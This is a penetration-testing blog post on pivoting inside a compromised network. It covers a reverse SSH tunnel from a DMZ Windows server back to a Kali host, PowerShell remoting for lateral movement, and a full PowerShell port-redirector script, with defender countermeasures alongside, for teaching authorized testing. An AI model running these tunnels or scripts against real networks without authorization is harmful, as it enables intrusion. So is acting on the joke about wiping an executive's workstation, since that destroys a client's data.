Resources / / Kali

Tactics to Maneuver Inside a Network: Using Kali and SSH to Pivot through your next Pentest

Welcome to the first post-introduction Tactics Guy blog! If you made it through the introduction, thanks for reading and I hope you got a good feel for what we’re trying to do here. Today we will be going over methods to maneuver inside a customer’s network during a penetration test. Why learn to maneuver? Is it because we are masochists and like inflicting pain on ourselves? Yes, but also because it is a key cyber tactic you need to know to be that elite penetration tester you claim to be in your twitter profile.

Everybody wants to be a hacker but don’t nobody wanna to learn how to pivot. – Ronnie Coleman (if he were a hacker) 
quote-everybody-wants-to-be-a-bodybuilder-but-don-t-nobody-wanna-lift-no-heavy-ass-weight-ronnie-coleman-54-84-64

Goal

The goal of the day is to move around freely inside an adversary’s network. Pivot from box to box, search for information, redirect our traffic to higher value targets, and other such malicious activities.

Tactic - SSH Tunnels

**Status of Forces **

Our attack workstation is on the open internet and we have gained command line access to a windows server in a DMZ which has access to an internal network.

**Initial Tactical Engagement **

In our initial tactical engagement we will be using an SSH tunnel to gain access to the internal network. First, we need to start the SSH server on our Kali workstation

Service SSH start

Second, we establish the SSH tunnel from the command line on the windows server that will open a remote port 4444 on the Kali workstation 123.123.123.123 and forward all traffic from that port through the SSH tunnel and towards a specified target 192.168.1.123 port 3389.

ssh -r 4444:192.168.1.123:3389 123.123.123.123

Third, we will try to remote desktop from our Kali workstation into the target by going through our remote port.

rdesktop 127.0.0.1:4444

**Adversary Counter Response **

SSH tunnels are great because ssh is an important protocol that is usually open on customer networks and looks like legitimate administrator traffic. However, if they see an SSH tunnel traversing their boundary and they don’t have remote IT personnel or use VPNs for remote personnel, it may look suspicious.

SSH is encrypted and can’t be snooped by any defensive devices. So an adversary who is doing full packet capture won’t be able to detect your super-secret 0-days that you should have sold to a 3 letter agency (you could have retired to the Bahamas…what a newb).

A good defense against this is that it requires an SSH client to be installed on the pivot computer to connect back to a SSH server on your Kali workstation. Thankfully windows just included an ssh client on windows by default in 2018 (holy balls batman it took them until 2018 to release a native ssh client).

Tactic – Remote Powershell session

**Status of Forces **

We have local administrator on a windows machine and a domain user account that is allowed remote access on the network

**Initial Tactical Engagement **

We will be looking at 2 powershell commands both of which require an administrator powershell terminal and remote management services enabled on the target.

In order to pivot to another remote computer with an interactive powershell session we will be using the Enter-PSSession command. The command below also gets your credentials and passes them to the command. There is a -usessl flag you can add on if you want to see a lot of red text and a failed command because Microsoft is awful.

Enter-PSSession -computername 123.123.123.123 -Credential $(Get-Credential)

When interacting with every computer becomes tedious you can use the Inovke-command powershell commandlet to execute a command or script on a target computer

Invoke-command -computername 123.123.123.123 -credential $(Get-Credential) -scriptblock {ipconfig}

It is best to change that IP address before you run that command lest you anger the Chinese hacking corporation it belongs to.

**Adversary Counter Response **

The best thing an adversary can do is prevent you from gaining access to a privileged account that can do remoting. They can do this by restricting user access to the local administrator and remote management users groups.

Proactively, the adversary can restrict workstations from communicating with each other at the switch and router level which would severely hamper your ability to laterally move across the network.

As far as hunting goes, catching someone using this technique is very difficult since they are using legitimate administrator tools to access the network. An adversary watching for suspicious commands that an attacker may be using would be able to find you. Proper technique is not to immediately run ipconfig on a target you just got onto by specifying the ip address in the command. Seriously, have some dignity.

Tactic – Powershell redirector script

**Status of Forces **

Our attack workstation is on the open internet and we have gained command line access to a windows server in a DMZ which has access to an internal network. The windows server does not have an SSH client on it.

**Initial Tactical Engagement **

One day I thought to myself, why doesn’t powershell come equipped with netcat? Then it hit me, it does, you just have to put a lot more work into it. Here is a powershell script that does redirection using the .net framework. The script will take any data received on $lport and spit it out at $rhost at $port. It has a timeout of 300 seconds as specified in the uniquely named $timeout variable and will close after the first connection. Anyone who wants a listen harder feature will have to add it to the script.

powershell_redirector.ps1 (it redirects SSH tunnels like a boss)

$lport = 11
$rport = 22
$rhost = "192.168.1.56"
$timeout = 300
$listener = new-object net.sockets.tcplistener($lport)
$listener.start()
$client = $listener.accepttcpclient()
$client.client.ReceiveTimeout = 10
$stream = $client.getstream()
$buffer = new-object system.byte[] 1024
$buffer2 = new-object system.byte[] 1024
$socket = new-object system.net.sockets.tcpclient($rhost,$rport)
$stream2 = $socket.getstream()
$starttime = get-date -uformat %s
while ($client.client.Connected -eq $true -and (($(get-date -uformat %s) - $starttime) -lt $timeout)){
if($stream.dataavailable -eq $true){
$line = $stream.Read($buffer,0,1024)
$stream2.write($buffer,0,$line)
$starttime =get-date -uformat %s
}
if($stream2.dataavailable -eq $true){
$line2 = $stream2.read($buffer2,0,1024)
$stream.write($buffer2,0,$line2)
$starttime =get-date -uformat %s
}
}
$stream2.close()
$stream2.Dispose()
$socket.close()
$stream.close()
$stream.Dispose()
$client.close()
$listener.stop()

I commit this script to the open source security gods on the requirement that you “accidently” wipe a C-level's workstation on any penetration test you use it on.

**Adversary Counter Response **

Unfortunately, the script does not encrypt the contents. Any adversary who is watching traffic on the network will be able to detect what you are sending down the line.

Additionally, in its current form, it is a script and requires an upload to the target computer. Where an adversary could have blocked script execution. However, a savvy pentester could easily condense it into a one-liner with a few semi-colons and a lot more time than I have.

Debrief

The most valuable part of analyzing tactics is the debrief. Understanding your enemy and how they are reacting to your movement inside a network is key to any engagement. Methods that aren’t available to you on certain workstations or at certain privilege levels can open up as you progress with your penetration test. Vectors that were once available may be closed off as you conduct your daily briefs with your customer, forcing you to evolve your techniques.